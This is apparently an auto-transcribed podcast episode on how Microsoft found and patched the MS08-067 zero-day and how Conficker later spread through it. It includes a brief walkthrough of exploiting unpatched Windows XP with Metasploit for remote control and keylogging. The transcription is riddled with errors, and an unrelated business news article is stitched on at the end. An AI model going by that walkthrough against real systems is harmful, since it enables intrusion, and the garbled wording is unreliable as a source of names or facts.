So first of all, it had an exploit. It had exploit code in it. OK, that didn’t mean it could be new. It could be an old one. It was at exploit on the stack, which is a critical part of memory that tells you that exploit was trying to be activated. Right now, it had a difference in it. What I call an egg hunt, which was an exploit technique that I had never seen before for any exploit in MSO 6 or 40. So this was either a new strain of that or something new for that service host and this a conscious and exploit writing technique where like as the bad guy, imagine you’re going to go scale a wall and you put all your attack tools in a you know, your thieving tools in a bundle and you throw it over the wall and then later you go scale the wall and go get that. And a cut breaks the exploit into two pieces for just serve a purpose. And it had that technique in it. So that alone drew my eye to look at it. And then the odds of there being a buffer overrun it and exploit in the same area as this MSO, six or 40 just seemed unlikely. And yet I felt like if it was new, this was really important. And so I just tried to stick with it and do what I could to rule in a rule out whether this was new. And one of the most stubborn clues was in a crash report. It has information about every diesel that is loaded into it and the vulnerable, the diesel that had MSO 6 or 40 was was loaded in it. That is the PSINet API 32. And the version information told me it was fully patched. So it clearly could not have been exploiting that vulnerability because that vulnerability did not exist in that version of the product.

John looked at the logs here and it looked like a hacker was exploiting two processes. One was basically injecting some hacker tools into the system, hiding an egg, if you will. And the other was going in and using those tools. A strange combo. But like John said, it was sort of like throwing your tools over the fence and then jumping over the fence to get them. The two processes being exploited here were a CBC host or service host net API 32.

Yeah. So sometimes when you are writing an exploit, you have constraints that you have to work within. And once your exploit starts to run, you have a number of steps as the attacker you’re going to want to do. Typically, that involves downloading some external piece of malware to that system and then launching that and then the rest of your attack. Then you’re resident on that computer and you can do whatever attacks that you want to do further from there. But you have to get it going. And sometimes that shell code is, as it’s called, to get going. You can’t fit within the constraints of the vulnerability, like the buffer, for example, needs to fit and is just too small a box to package all those instructions with it. And so in a hunt is a technique that is designed to solve that by first sending over some data and interacting with the vulnerable program in a way that doesn’t use the vulnerability at all. It just tries to get data in memory that is that bag of tools, that shell code that they are going to use later. And then the only thing that they need to get when they actually run the attack is a very small piece of shell code that basically goes and searches memory to find that bag of tools.

What a tricky exploit. And because there’s two parts to this bug, it makes it really hard to find. The more John looked at this particular crash report, the more he started to realize this was actively exploiting an unknown vulnerability in windows, which makes it a zero day bugs.

This, in a way, was the hardest moment of this entire thing for me, because I clearly had enough evidence to say this was a new attack, a new vulnerability that we did not know about. And to get the company to act, you need to actually pinpoint the vulnerability. We have to know what’s the code that’s wrong. Otherwise, nothing can happen. And I pored over the code and pored over the code and I could not figure it out. At one point, I decide the clock is ticking. This is a potentially really bad situation. I. Go ask for help if I’m going to figure this out. And I walked over to the office of Andrew. Andrew was a colleague of mine. We had worked together previously, actually. Andrew had looked at many crash reports for security objectives for a long time. And he knew he knew what this hunt was like, which is in a lot of ways, it can be a very frustrating hunt. And you can spend hours looking at something you think is real and then it’s not. And so what I wanted is hand this to one of the MSR C engineers and they will go figure this out. And he was reluctant to take an engineer off of an existing confirmed vulnerability that somebody else had reported. You know, it was in the middle of to go potentially chase a ghost. So he took it on, took a look at it. I think in his mind say, look, this is a false positive. This is not a real issue. And case closed. And and so there was some tension in the air with me really pushing a busy team to go look at something that likely was not going to pan out. But I felt like it could be important enough. It’s worth doing that. And Andrew wanting to protect his team, but do the due diligence to make sure we got the answer right.

So Andrew got a copy of this crash report and the code for these processes. And he started analyzing all this. He spent a couple of days looking at over and working on it, trying to find what the crash report means. There’s an egg somewhere in the code, but neither of them could find it. But this error report did say that there was something causing a crash. Now, keep in mind, John had only seen one crash report from this. This wasn’t a widespread issue. So both John and Andrew weren’t entirely sure how much effort they should spend in looking for something that only happened once on one computer. But if there was an unknown vulnerability, both John and Andrew wanted to find it and fix it.

So Andrew kept looking.

And then at one point he stops by my office and the look on his face told me everything.

The look was the look that that a security researcher has when they found something. There’s a goofy, happy smile that is also full of holy cow. I can’t believe how serious this thing is that I just found.

He said I found a vulnerability. And when I heard that, I I knew everything was going to the next two weeks of my life were going to be completely different because this was vulnerability was in an area that would allow an Internet worm to be written against it.

The vulnerability they found allowed an attacker to take remote control of a Windows computer. No need for a username and password. No need for RTP to be enabled or anything like that. Just give me full control of that computer and now I can issue my own commands on it, see any files, do whatever I want on that computer as if I’m right in front of it. And of course, to top it off, it’s a vulnerability in a fully updated version of Windows in the security world. We call this kind of vulnerability and RC, which means you can do remote code execution like a hacker can execute whatever commands they want on the victim’s machine. And this is the worst kind of vulnerability. It’s the most critical, the most severe, because you absolutely never want just any Joe Schmo executing commands on your computer, which has full defences up if you can run whatever commands you want on someone else’s computer. It pretty much means it’s your computer.

But to top it off, as if this highly critical and severe vulnerability wasn’t enough.

This exploit was where Amabel formable means that you have a vulnerability that an attacker can write and exploit for, and it can propagate across the internet, exploit that vulnerability, and then turn around and continue to repeat the process and propagate further. So it becomes a viral outbreak and it is the most damaged, damaging, devastating, disruptive kind of attack that can take place. And the world has seen many worms in the form of Blaster Code Red named Slammers Zotob. And we knew how devastating these attacks can be. Entire businesses are disrupted. Systems are taken offline. Network traffic gets clogged with worms, replicating out of control, using up all available bandwidth. And so we knew what the potential was. We didn’t think that that state had been happening yet, but we knew that was possible.

So when Anjou came to John’s office and told him this vulnerability is real.

Hummable, the two immediately jumped up and spring in action, so Andrew and I both are on the engineering side and we knew we needed to go activate the crisis response part of Microsoft.

So he and I immediately leave my office. We walk down the hallway to the office of the crisis manager. His name is Philip. Phillip has worked on many of Microsoft’s most important security crises, and he is chatting in his office with a colleague. We show up. He knew that wasn’t a good sign. We look at EPP and say we need to talk. He looks at his colleague and says, I’ll talk to you later. And then I said, We have a zero day.

And he just knew by the two of us showing up in that fashion that something bad was happening. I am mostly of have toothe emotions going on, one is we need to get all of Microsoft engaged on this that can do something about this. So that is a an impetus to go make sure you’re informing people so they understand the severity right away and they can begin the mobilization process. And then the other side of me was. What is really going on out there? I have one crash report. I don’t know if there are a hundred thousand out there just like this. And this is a worm that is raging across different parts of the world. Or this is something that’s just getting started.

So the the I immediately wanted to go and get some better situational awareness about scope and scale to know what we were really dealing with.

John and Andrew briefed the crisis manager on what’s going on. That a very serious worm, a bull, an extremely critical vulnerability is present in windows and needs to be fixed immediately. And while they found this in Windows XP, the vulnerability existed in more than just XP.

Yes. And it affected every version of Windows up until we had at that point. So Microsoft has a crisis response process that they invoke when one of these things occur. It’s called a SERP internally. And then a book called Bridge is stood up. And then all of the kind of crisis partners across the company join that call. And then Philip would take them through. Here’s a summary of the situation. And generally speaking, if there’s a vulnerability in windows, you know, teams know what to do. This would involve a lot more teams because they had to be ready for customer support calls. What is if there’s an attack? What is the malware? What is the threat side of it look like? And the anti-malware team will start building signatures for that. We knew we had to prepare data for all of the security partner companies across Symantec, McAfee or whatnot for them to help go protect their customers and the ecosystem. And and then the engineering team needs to go, OK, what do we have to do to fix this vulnerability? And are there any others just like it waiting there that we need to fix at the same time so we get the patch dead? Right.

A huge conference call was setup with pretty much someone representing all the different departments of Microsoft. The goal was to get everyone engaged in helping solve this as quickly as possible. This vulnerability was much more severe than any of the others they found.

Once I knew that the right people were engaged and working to get the right patch out the door, the thing I could go help on was how often is this happening and where is it happening? And I called that dialing into the crash buckets to find any information I could about how often this was occurring. Then I was able to bring back the situational awareness to the crisis response that said, OK, I saw it five more times today. It just spread from Malaysia to Japan to Singapore to what-not. And they could get a sense of OK. It’s the same attack payload communicating with the same IP address on the enter to pull it down, but it’s spreading from geography to geography to geography. So it didn’t look like a worm, but it looked like some set of of hackers that were going around using this tool across a variety of targets, expanding its scope every single day.

See, that’s fascinating. So somebody knew this vulnerability. They found this before Microsoft did and was using it. And this wasn’t just some accidental bit flip or something that caused the crash report like this was actually somebody had coded this and was using it in in Asia.

That’s right. So some somebody found this vulnerability, probably got the bonus of the year for finding it, and then it was weaponized. And then some group unknown to this day was using it in those geographies where we saw these crash reports coming and the tool was not completely reliable. And so that’s the crashes that we’re seeing. That’s when it failed. But obviously it worked and it succeeded a bunch of the time. And I didn’t know how often you for every crash is that one in one hundred times that it’s crashing or is it one in a thousand? You know what shadow of the real activity am I seeing? That was an unknown that we were working against.

And so but I could use this to sort of get a sense of it.

If it’s spread in its reach and its pace now, this became a top priority for the development team to fix. They dove into the code and fiercely started to rewrite the code to fix this problem.

And they did. They fixed the vulnerability. But this is not the end of our story. No, no, no, no, no, no. This is just the genesis. And stay with us, because after the break, we’ll hear how this went on to become one of the most notorious bugs ever to be found in windows.

Support for this episode comes from pro circular. Now, even though vendors make patches available for us to update our computers, patching is still really hard. It requires juggling files and scheduling reboots and to do all that at scale against all your computers. It can be a nightmare. No wonder MSO 8 0 6 7 was a problem for a whole decade. Pro Circular has helped hundreds of clients slay that dragon. It’s all about adding security in layers and they’re really good at helping with all the details of getting your network secure. They have a team that can help your business with patching and vulnerability management. Doing some monitoring that actually works penetration testing to verify it’s actually secure and incident response in case things do actually go bad. Whether you’re just getting started or looking to move to the next level at securing your business’s network, prosecutor has the people and resources to help you get their pro circular. It will help you confidently manage your cybersecurity risks. Visit w w w dot pro circular dot com. That’s w w w dot pro circular dot com.

Now that a fix was written and a patch was ready, a decision had to be made about how to release this to the world.

Right. So that there’s a decision point as part of this response process, which is OK. When is the patch going to be ready? And the ideal time to release a patch is on Patch Tuesday, because every I.T. team in every company knows on the second Tuesday of every month, there’ll be a set of security patches from Microsoft. And they know to organise their patching of their fleet of systems and take their downtime and their maintenance time to go put them on. And they know some of them will be severe and they should do that right away. So I.T. teams are best ready to consume those updates and put them out at that time. The other option is you just ship it when you’re ready. We call that going out of band. That gets the solution out there sooner. But at the same time, none of those I.T. teams are necessarily ready and poised to go grab it. And when you had a situation where there obviously was an attack in the wild that attackers were doing and we wanted to go stop that from happening, but we knew as soon as we put this out, copycat attacks would happen by people reverse engineering the patch and understanding, and that would spawn a whole nother wave of attacks. And so there was this like weighing of if you go out of band, you could spawn a bunch of copycats of a very damaging vulnerability when I.T. teams are not ready to go put it on and there could be more victimization. Theoretically, the bottom line in terms of our calculus on it was with a very severe vulnerability. It was warm, a bowl. It affected every version of Windows. We had a solution and we went out of hand.

This vulnerability was so severe that they decided to not wait until Patch Tuesday and just push this out immediately as soon as they got it. And this patch went out in 2008 and it was the sixty seventh patch of the year which famously made this M.S. 0 8 0 6 7.

Yeah. So that there were two most interesting things that happened after we went out of band. The first one was that attacker where I was seeing crash reports still coming in every day until we went public as soon as we went public. That attack disappeared and I never saw him again.

And how can you how can you trace that? Because I mean, oh, so you have like a signature for certain machines that kept getting attacked.

Well, part of the attack details that were hidden. So one, the shell code and egg hunt were kind of a fingerprint that let me see, that were consistent across all the crashes I had gotten to date for this issue. All of them were contacting the same IP address of a server in Japan and downloading a payload from it. And so all of that was consistent.

And then the day the patch goes live and we announce it. I see no more crash reports from this anymore. And then there’s this period where for a number of hours or a day, nothing’s coming in anymore. And then we see it start to see sort of see new crash reports for the same issue that were clearly security companies reproducing this vulnerability. They’d reverse engineer what we fixed in the patch. They were writing their own proof contests, concepts to crash. Crash it. Not right exploits for it, but just to probe the vulnerability, to make sure they understood it. And we started seeing those crash reports come in from the security researcher side. And soon enough, a few days later after that, we started to see new attacks from the first wave attackers that was clearly different and new than the original ones that look like, you know, bots or bot net programs adopting this as a spreading mechanism. And we started to see that wave as well.

See, this is what I mean by this being only the genesis. Now that the patches out there, both white hat and black hat, hackers analyzed the patch to figure out what this exploit was and how to run it, which means now this tool went from being just used by a single hacking group somewhere in the world to now being known by the general hacker community. And within a short time, it would become available for anyone in the world to just download and use.

Isn’t that a strange dilemma or decision to have to make, though, knowing that if you put a patch out, this reveals the vulnerability to the world for any hacker to use. But Microsoft has a duty to make secure products, so they absolutely have to release the patch whenever they do find a vulnerability like this, because this has far reaching effects on helping people stay secure in the first week.

We it was on Windows Update and within seven days I think we had patched 400 million machines.

This is sort of the awesome part about Windows Update. It’s a system that had been built to be to patch the Windows ecosystem at scale. And this is one of those times when you really needed it. And it came through in terms of our ability to essentially inoculate a huge swath of the world against this vulnerability in a very short period of time. And so it was very effective about that.

It’s hard to know for sure, but my best research tells me there was about one billion Windows computers in the world at that time, and this vulnerability affected all of them. So by having 400 million of them patch in the first week was a huge win for helping the world become more secure. 40 percent of the Windows computers in the world were no longer vulnerable to this right away. That’s awesome and amazing.

So all of this was in October and sometime in early December, the Conficker worm that had been the sort of small scale thing for a time.

Adopted this vulnerability as a spreading mechanism, and then it began to use that against systems around the world that had not put this patch on yet.

And if you think about, well, what if only one percent of the Windows pieces in the world don’t patch, that’s still millions of systems.

And so a lot of the damage that was done by Conficker, which was significant. Imagine what would have happened if it had a half a billion more pieces that were vulnerable and not patched against this issue.

Conficker was the first big attack to use this exploit just months after John discovered this vulnerability, Conficker figured it out and used it to arm itself to infect Windows machines, because the vulnerability in MSA 0 8 0 6 7 was so effective. Conficker spread rapidly worldwide, ultimately infecting computers in over 190 countries worldwide. It would eventually infect millions of computers. Conficker was spreading in a terrible way. I mean, think about how horrible this is for some hacker group to have full control of millions of Windows computers worldwide. I’m talking about government agencies, business at home, PCs. The hackers could see all the files on them, run any commands they wanted to install keyloggers, take screenshots, install root kids or do whatever they want on these computers.

It’s so frightening to think about that. Conficker continued to spread, seemingly unstoppable. By January, 30 percent of Windows Computer still did not apply the patch to protect themselves from Emmis 0 8 0 6 7 4 Conficker, which means hundreds of millions of computers were still vulnerable to this. Conficker had a field day with everyone who didn’t bother to patch and eventually was able to infect 10 million Windows computers worldwide million as far as I know.

This makes Conficker the largest worm ever. All thanks to M.S. 0 8 0 6 7.

It was disappointing because. At the same time, a strong lesson because we’ve put the patch out right.

The job is done. It’s time for the world to put the patch on their systems. That’s the step they have to do. There isn’t anything further that we thought we could do. And yet look what happened and what came after that. All of this damage from Conficker. Now, Conficker had other ways to spread through USB drive infections and scanning file shares and so forth. But still, there was a large part of the world that that had not patched against this vulnerability. And it was a bit of a lesson for just how damaging things can become and how much of the world can be exposed to these attacks even once we think we’ve done our part of the job.

It’s fascinating to me to see that John here was the one who decided to take it upon himself to look at that crash report to discover this. If it wasn’t for him, who knows how long this would have stayed out in the world before being discovered?

Yeah, I think, you know, these operators using this tool thought they had a really great a new attack and probably would have used it if it was more reliable.

And we had not seen this for potentially years. You know, if they were stealthy and choosy about how they how they used it. And sometimes these exploits we do learn about zero-day have been in use for years and very disciplined ways. The noisier operators are with it. The more likely that some victim is going to find out about it and somehow they’ll get a whiff of how the attack is working and the thing can get patched. But, you know, I I think if we had not seen this one in this way, very likely this operator could have continued for a very long time with it.

This makes me think about how stealthy some hackers could be. I mean, imagine if the hackers disabled WCR or blocked all connections to Microsoft. This would have been an effective technique to keep Microsoft from seeing these crash reports and discovering this. But maybe that’s going too crazy with it. But see, sophisticated hackers take extreme measures to hide their tracks. I mean, that’s almost one of your adversaries, right? Are these a Petey’s like the NSA? It’s like you’re battling with them, like it’s an arms race between you as the vendor and them as the aggressor.

Do you feel that way? Sometimes it does feel like that’s some way that sometimes in the sense of. There are people that have weaponized vulnerabilities and are using on the wild and in a way, the defenders that are at Microsoft, Google and other companies. I don’t care who these people are or why they’re doing it. We just want to find what they’re doing and take those tools away from them. And so every time a zero-day is found in the wild by some defender organization and it gets patched, that is a happy day for me.

What a strange thing to think about. Does that put you in deep thought, too?

I mean, the truth of the matter is that the NSA is actively looking for vulnerabilities in windows so that they can use that against their adversaries. And then here’s John actively trying to figure out what the NSA is up to. So he can basically expose their secret weapons. I don’t know what to think about that. I don’t know who the bad guy or the good guy is in this. NSA is supposed to be working towards keeping our country safe, but at the same time, they have to develop cyber weapons to attack other nations. So it almost seems like the NSA would see John and Microsoft as the enemy and John might see the NSA as the enemy.

And I just never thought about how these two would be battling each other like this. It’s just wild to think about this relationship.

Yeah. And then in many ways, I feel like I relive this whole moment. A couple of years ago, when the internal blue exploit was discovered, this is one of these NSA tools that the shadow broker’s group leaked onto the Internet. A patch was produced for it. That was M.S. 17. Oh, 1-0. And a couple months later, the one, a cry worm was unleashed and spread in a very similar way, had a more destructive payload and ran across the globe against systems that had not patched.

Now, if you recall in earlier episodes, NSA actually did tell Microsoft about Eternal Blue just before the shadow broker’s published it to the world, giving Microsoft an early warning. Who were able to move quickly and patches before it was released? I’m guessing the NSA knew it was going to be published and wanted to help the world.

Just stay slightly ahead of the game, but that must have been an awkward phone call or whatever from Microsoft to get the memo that NSA has found a devastating exploit in Windows and this exploit got leaked to shadow brokers and they’re about to leak it to the world. Now, I don’t know. It’s a weird, tangled mess when you get into the relationships between NSA and Microsoft. And just to be clear, there’s no link between MSO 8 0 6 7 being found by the NSA.

Oh, something happened last week. That’s kind of interesting, too. Last week was Patch Tuesday and boy, was it a doozy. There was a bug patched. It was cryptographic API bug and Windows 10, which basically allows an attacker to pose as someone they aren’t in your computer could send trusted information to it. But here’s the thing. This bug was reported to Microsoft by the NSA. In fact, it was so important. The NSA even held a press conference to urge people to patch. This is very rare. I mean, we don’t know how many times the NSA has reported bugs to Microsoft. They could be doing this all the time. But we do know for sure that there were two times that they did do it once when shadow broker’s got the NSA exploits. And now again last week, the NSA says they told Microsoft because they want to build more trust with people and help keep computers secure. Really, it could be that a world is changing and new things are happening and the NSA might be doing this are now on to try to keep the country safer by working with vendors to get things patched. And in fact, they have done stuff like that for a while, but it’s all been small potatoes versus like the God mode bugs that the NSA keeps to themselves. So my theory is this the NSA gave this bug to Microsoft. Why? Maybe it was just to build better PR. OK. But then maybe the NSA knows something we don’t like. Maybe they uncovered a huge men in the middle campaign that some foreign government was doing to many Americans and thought it could have devastating results. So this was their way to stop it. Or maybe the NSA lost another exploit and didn’t want their enemy to have it. I don’t know. But I have a feeling there’s more to this story, though.

So back to Conficker, you might be wondering what happened there. And like I was saying, Conficker infected 10 million computers and was growing. However, it was a mystery as to what Conficker actually did or who made it or what it was supposed to do while it was infecting systems worldwide. It was apparently not doing anything. Once it was infected on a periodic basis, the computer that had Conficker running on it would reach out to certain domains to receive instructions on what to do next. But it just didn’t get any instructions to do. Security teams all over the world feared that maybe there were instructions to do on a particular day. And in fact, for some weird reason, we thought that on April 1st, 2009, there was gonna be some big surprise that Conficker was going to give us. I remember being in the office that day and setting up a conference bridge in a war room with everyone from I.T. and looking for signs of Conficker kicking up or something. But nothing happened. A few companies got really fed up with Conficker spreading everywhere, so they decided to do something about it. In February 2009, something called the Microsoft Cabal was formed.

This included people from Microsoft, Verizons, Neustar, America Online, Symantec, F-Secure, researchers from Georgia Tech and the Shadow Server Foundation and so many more organizations. It was a huge list of companies that came together to figure out a way to stop Conficker. They would do things like reverse engineer Conficker to see how it worked and then write fixes to block Conficker from spreading more. But then whoever made Conficker would change how it was infecting machines so it could keep infecting machines, creating a new variant of the worm. It became a game of cat and mouse with the security professionals blocking it and the worm creator getting around that. At some point, Microsoft said they’re willing to pay two hundred and fifty thousand dollars for information that leads up to the capture of whoever created the Conficker worm. They were taking this pretty serious. The FBI started getting involved and the hunt began to look for whoever was running this worm. The author, Mark BOWDEN, did some extraordinary research into this worm in his book, which is just titled Worm. He writes, There are a few theories on what Conficker was.

One is that it was just a security researcher playing around, making a crazy worm, but never intended to do any harm with it, just trying to see how big it could get. Another theory was that a government created this worm and was waiting for instructions to maybe attack on command or spy on people or something. But as more organizations joined the Microsoft cabal, the more effort put into looking into this and they may have found the answer.

They reverse engineered the code and did everything they could to trace it back to their creators. And they handed this information over to the FBI, who then arrested three Ukrainians. Sergei, Yev, Jan and Dmitri. These Ukrainians all were millionaires. They drove black Porsches and they lived in penthouse apartments. And their story was that they ran a Web site with employees and everything. And they paid themselves, but they weren’t paying themselves very much. And so they were arrested on tax evasion charges. And the feds seem to have found some evidence of Conficker code on their work computers. But I don’t think we have any idea what happened to the next. It doesn’t seem like the FBI was able to extradite them to the U.S. and they just disappeared into the Ukrainian courts.

But the FBI also arrested one other guy, a Swede named Mikhail. Mikhail was arrested in Denmark in connection with this and extradited to the U.S.. The court records don’t say anything about Conficker, though. Instead, the FBI found evidence that Macao was infecting computers and putting scare wear on them. This is where he would infect a computer and say there’s a virus on it and you need to buy this anti-virus. But when the victim buys the anti-virus, nothing actually gets fixed.

The FBI claims McKale made $71 million from his scare where campaigns, which is a really big haul to get that much. You must have had a lot of infected machines. And there was evidence in some of the variance of Conficker that it was capable of running scare aware. So it might have been getting ready to launch a big campaign to do just that, but it never did. McKale got two years in prison for his scare where scams that he was running and it’s alleged that he had ties to those Ukrainians who also got arrested over Conficker. So it seems like the best theory now was that Conficker was made by a group of Ukrainian cyber criminals who may have been planning on using it to send spam e-mails or running scared where to scam its victims, but they never got to it.

And what’s truly fascinating about Conficker is that it’s still out there infected on a ton of systems, even though M.S. 0 8 0 6 7 was passed in 2008. There are still computers out there that are running systems older than that that haven’t been patched still. And the latest estimate is that Conficker is still present on 400000 computers today.

M.s. 0 8 0 6 7, we’ll go down in history as one of the most notorious vulnerabilities in Windows ever. And the reason for it is because of how effective it is. I personally love playing around with this vulnerability and exploiting Windows computers with it because it’s so easy to do. And I want to walk you through how I’ve done it. First, you need a version of Windows from before 2008, which is actually quite easy. You just install Windows XP on a computer and don’t patch it. This will be vulnerable to it. Then you need to run this exploit against it. Now, instead of knowing what shell code to send to the computer and work all that out, there’s a crazy shortcut. It’s called med’s boyte. Medfly is an incredible hacking framework and has over a thousand exploits, all pre-programmed and ready to run. So you pick the M S 0 8 0 6 7 exploit, then point out your Windows XP machine type run and boom you’re in. Now when I mean you’re in, you’re really in menace. Boy has tools to allow you to use that computer you just infected as if you’re right in front of it. You can run any command you want on that computer all through the command line, take screenshots of the desktop and able to make enable the camera, run a keylogger to watch what someone types you can do.

All that and more. Menace Boy is an amazing hacker tool, which is a standard for any hacker to know how to use today. And the best part about Matus point is that it’s free and open source. Anyone can grab it, study a few commands and have over a thousand exploits ready at their fingertips. It’s really powerful fun to play with, and if you attend any ethical hacking training, chances are you’ll be given medals. Floyd and a system vulnerable with M.S. 0 8 0 6 7 as one of your first hacks you’ll do using it because it’s pretty easy to use and you can see how effective misplay can be. So because of that, penetration testers all over the world are very familiar with M.S. 0 8 0 6 7 and all have that number memorized. However, it’s now 20/20. So MSO 8 0 6 7 is a dozen years old now, which means there are far fewer computers running Windows XP or that are vulnerable to this attack. So this bug is losing its notoriety. It’s much more rare to find a system vulnerable to this today, but they do exist.

This story is another example on why it’s so important to update your software as soon as you can. However, it’s not always that easy. Some networks have very strict controls like they can’t patch. A patch might break everything. The applications and software running on the computers doesn’t always work with the latest OS updates applied and this quickly becomes a nightmare. I recently updated my home computer and a lot of the software that I was running stopped working, so I had to wait for each application maker to put out an update for me to be back up and working again. Something like this is totally unacceptable in critical networks like hospitals or power plants, so it’s not always as simple as just patching it. Like I was saying at the beginning, it’s a lot of different people’s jobs to keep our network secure. In this case, Microsoft did their job at finding a bug and issuing a patch for it. And now that fix needs to trickle all the way down to everyone’s computers because by being on the most up to date version, it is like giving yourself a vaccination to render yourself safe from the known attacks in the world. Updating your apps, operating systems and programs. In my opinion, is the single most effective thing you can do to protect yourself on the Internet today.

A big thank you to John Lambert from Microsoft for coming on the show and sharing this story with us. I found it to be really cool. Also, if you want to know more about Conficker, check out the book Worm by Mark BOWDEN. It goes into a lot of details about as Breguet. Hey, if you’re all caught up with this podcast and want more episodes, check out The Dark Knight Diaries Patry on page and you can find bonus episodes there. The show is made by Meet the Cyber Ghost, Jack Reciter Music and this episode was special. Typically I grab songs from all over, but in this one every single song was created by the top talented brake master cylinder. And even though hoodies go up and drawstrings get pulled tight every time I see it, this is Darknet Diaries.

(function(s,o,n,i,x) {
if(s[n])return;s[n]=true;
var j=o.createElement(‘script’);j.type=’text/javascript’,j.async=true,j.src=i,o.head.appendChild(j);
var css=o.createElement(“link”);css.type=”text/css”,css.rel=”stylesheet”,css.href=x,o.head.appendChild(css)
})(window,document, “__sonix”,”//sonix.ai/widget.js”,”//sonix.ai/widget.css”);


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Turbo Systems hires former Looker CMO Jen Grant as CEO

Turbo Systems, a three-year old, no-code mobile app startup, announced today it has brought on industry veteran Jen Grant to be CEO.

Grant, who was previously vice president of marketing at Box and chief marketing officer at Elastic and Looker, brings more than 15 years of tech company experience to the young startup.

She says that when Looker got acquired by Google last June for $2.6 billion, she began looking for her next opportunity. She had done a stint with Google as a product manager earlier in her career and was looking for something new.

She saw Looker as a model for the kind of company she wanted to join, one that had a founder focused on product and engineering, who hired an outside CEO early on to run the business, as Looker had done. She found that in Turbo where founder Hari Subramanian was taking on that type of role. Subramanian was also a successful entrepreneur, having previously founded ServiceMax before selling it to GE in 2016.

“The first thing that really drew me to Turbo was this partnership with Hari,” Grant told TechCrunch. While that relationship was a key component for her, she says even with that, before she decided to join, she spoke to customers and she saw an enthusiasm there that drew her to the company.

“I love products that actually help people. And so Box is helping people collaborate and share files and work together. Looker is about getting data to everyone in the organization so that everyone could be making great decisions, and at Turbo we’re making it easy for anyone to create a mobile app that helps run their business,” she said.

Grant has been on the job for just 30 days, joining the company in the middle of a global pandemic. So it’s even more challenging than the typical early days for any new CEO, but she is looking forward and trying to help her 36 employees navigate this situation.

“You know, I didn’t know that this is what would happen in my first 30 days, but what inspires me, what’s a big part of it is that I can help by growing this company, by being successful and by being able to hire more and more people, and contribute to getting our economy back on track,” Grant said.

She also recognizes that there is a lack of diversity in her new CEO role, and she hopes to be a role model. “I have been fortunate to get to a position where I know I can do this job and do it well. And it’s my responsibility to do this work, my responsibility to show it can be done and shouldn’t be an anomaly.”

Turbo Systems was founded in 2017 and has raised $8 million, according to Crunchbase. It helps companies build mobile apps without coding, connecting to 140 different data sources such as Salesforce, SAP and Oracle.